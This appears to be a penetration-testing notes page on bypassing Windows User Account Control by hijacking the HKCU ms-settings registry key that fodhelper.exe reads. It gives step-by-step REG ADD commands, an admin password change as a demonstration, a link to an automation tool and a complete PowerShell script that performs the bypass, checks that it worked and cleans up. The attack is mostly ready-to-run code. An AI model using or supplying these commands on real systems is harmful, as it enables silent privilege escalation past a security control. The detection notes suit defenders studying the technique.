# UAC Bypass

## UAC bypass

User Account Control (UAC)

**Vulnerable binary used as the example: fodhelper.exe** (a Microsoft-signed, auto-elevating binary in System32)

* **Gather info regarding the exe's integrity level and permission requirements**

  Tool: sigcheck.exe (Sysinternals)

  * In cmd, cd to the SysinternalsSuite directory and run `sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe` (`-m` dumps the embedded manifest)
  * The manifest shows `requestedExecutionLevel level="requireAdministrator"` and `autoElevate` set to `true`, i.e. for a user in the local Administrators group the binary is started at high integrity without a consent prompt
* **Gather info about how this exe interacts with the file system and the Windows registry**

  Tool: Procmon.exe (Process Monitor) from Sysinternals

  * Open Procmon.exe, start fodhelper.exe, then add the filters below
  * Filter: Process Name, is, fodhelper.exe, Include
  * Filter: Operation, contains, Reg, Include
  * Filter: Result, is, NAME NOT FOUND, Include
  * Filter: Path, contains, HKCU, Include
  * Apply the filters and look for an interesting path that we can modify. For example, **HKCU\Software\Classes\ms-settings\shell\open\command** is worth checking
  * Now remove the Result filter and change the Path filter to: Path, contains, ms-settings\shell\open\command, Include
  * Check whether the process successfully reads that key in some other hive; the result gives us more clues. When **HKCU\Software\Classes\ms-settings\shell\open\command** is not found, it falls back to the same path under HKCR, which exists, and that read succeeds
  * Because the exe looks up **HKCU\Software\Classes\ms-settings\shell\open\command** first, and HKCU is writable by the current user without elevation, we can create that key ourselves
  * Add the key with the **REG** utility in cmd: `REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command`
  * Restart fodhelper.exe with the first four filters applied again
  * The vulnerable exe now looks for a **DelegateExecute** value in the newly added key
  * Add **DelegateExecute** with an empty value in cmd: `REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ`
  * Restart fodhelper.exe again with the 1st, 2nd and 4th filters applied
  * This time the lookup succeeds, but since **DelegateExecute** is empty the exe also reads the *(Default)* value of the **Shell\Open\command** key. The *(Default)* value exists (but is unset) as soon as the key is created
  * Replace the empty *(Default)* value with an executable of our choice, **cmd.exe**, in cmd: `REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f`
  * **Exploit**
    * Restart fodhelper.exe; it now opens **CMD** automatically at high integrity level, with no UAC prompt
    * To verify high integrity, run `whoami /groups` in the new window and look for `Mandatory Label\High Mandatory Level`, or try something that needs admin rights, e.g. change the admin password: `net user admin Ev!lpass`
    * Caveats: this only works for an account that is a member of the local Administrators group (a standard user gets a credential prompt instead), and the hijacked key is a well-known indicator, so Microsoft Defender and EDR products commonly detect or revert writes to `HKCU\Software\Classes\ms-settings\Shell\Open\command`; delete the key once done
  * **Automation tool** (abuses Event Viewer, a different auto-elevating binary, rather than fodhelper.exe)
    * <https://github.com/CsEnox/EventViewer-UACBypass>
    * `Import-Module .\Invoke-EventViewer.ps1`
    * `Invoke-EventViewer cmd.exe`
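The fodhelper.exe procedure above as a single PowerShell script, with a check that the spawned process really runs at high integrity and a cleanup step. This is an added example, not code from the original page or from any of the tools it links; it assumes the current user is in the local Administrators group, that it is run from a normal medium-integrity PowerShell window with UAC at its default level, and the names `$KeyPath`, `$OutFile` and `$Payload` are chosen here for illustration.

```powershell
# Added example (not from the original page): fodhelper.exe UAC bypass in
# PowerShell, with verification of the child's integrity level and cleanup.
# Assumes: user is in local Administrators, medium-integrity session,
# default UAC level. $KeyPath/$OutFile/$Payload are names chosen here.

$KeyPath = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
$OutFile = Join-Path $env:TEMP 'fodhelper_check.txt'   # written by the elevated child

# Instead of a bare cmd.exe, the payload records the child's token groups so
# the script can verify it; swap in "cmd.exe" for an interactive high-IL shell.
$Payload = "cmd.exe /c whoami /groups > `"$OutFile`""

# Step 1: create the key fodhelper.exe probes first (NAME NOT FOUND in Procmon).
New-Item -Path $KeyPath -Force | Out-Null

# Step 2: an empty DelegateExecute makes fodhelper fall back to (Default).
New-ItemProperty -Path $KeyPath -Name 'DelegateExecute' -Value '' `
    -PropertyType String -Force | Out-Null

# Step 3: (Default) holds the command fodhelper launches at high integrity.
Set-ItemProperty -Path $KeyPath -Name '(Default)' -Value $Payload

# Step 4: trigger the auto-elevating binary; no consent prompt appears.
Remove-Item -Path $OutFile -ErrorAction SilentlyContinue
Start-Process -FilePath "$env:SystemRoot\System32\fodhelper.exe" -WindowStyle Hidden

# Step 5: wait for the child to write its token groups, then inspect them.
$deadline = (Get-Date).AddSeconds(10)
while (-not (Test-Path $OutFile) -and (Get-Date) -lt $deadline) {
    Start-Sleep -Milliseconds 250
}

if (Test-Path $OutFile) {
    $groups = Get-Content $OutFile
    if ($groups -match 'High Mandatory Level') {
        Write-Host '[+] Child process ran at High integrity: UAC bypassed'
    } else {
        Write-Host '[-] Child ran, but not at High integrity (key reverted by AV, or user not an admin?)'
    }
} else {
    Write-Host '[-] No output from the fodhelper child; check Procmon for what it read'
}

# Step 6: clean up. Leaving the key breaks the ms-settings: handler for this
# user and is a loud indicator (a value set on this path is a common Sysmon
# Event ID 13 detection). HKCU\...\ms-settings does not exist by default,
# so removing the whole key restores the original state.
Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
Remove-Item -Path $OutFile -ErrorAction SilentlyContinue
```

The output file is written to `$env:TEMP` because the elevated child still runs as the same user, so the path resolves identically on both sides; the same trick (a payload that leaves evidence of its integrity level) is also the quickest way to confirm the bypass on a host where Defender may be silently reverting the key.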
